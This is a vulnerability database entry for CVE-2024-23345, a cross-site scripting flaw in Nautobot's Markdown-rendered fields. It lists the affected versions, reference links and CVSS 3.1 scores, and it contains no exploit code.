Nautobot has XSS potential in rendered Markdown fields
CVE-2024-23345

7.1HIGH

Key Information:

Vendor

Nautobot

Status
Nautobot
Vendor
CVE Published:
23 January 2024

What is CVE-2024-23345?

Nautobot, a web application designed for network automation and as a source of truth, contains a cross-site scripting vulnerability due to insufficient input sanitization. This affects user-editable fields that support Markdown rendering, allowing attackers to exploit these weaknesses through maliciously crafted data. Users of Nautobot versions before 1.6.10 and 2.1.2 are at risk. Mitigation has been implemented in the latest versions to address these vulnerabilities.

Affected Version(s)

nautobot >= 2.0.0, < 2.1.2 < 2.0.0, 2.1.2

nautobot < 1.6.10 < 1.6.10

References

https://github.com/nautobot/nautobot/security/advisories/...
x_refsource_CONFIRM
https://github.com/nautobot/nautobot/pull/5133
x_refsource_MISC
https://github.com/nautobot/nautobot/pull/5134
x_refsource_MISC

CVSS V3.1

Score:
7.1
Severity:
HIGH
Confidentiality:
Low
Integrity:
High
Availability:
Low
Attack Vector:
Network
Attack Complexity:
High
Privileges Required:
Low
User Interaction:
Required
Scope:
Changed

Timeline

  • Vulnerability published

  • Vulnerability Reserved

JSON
.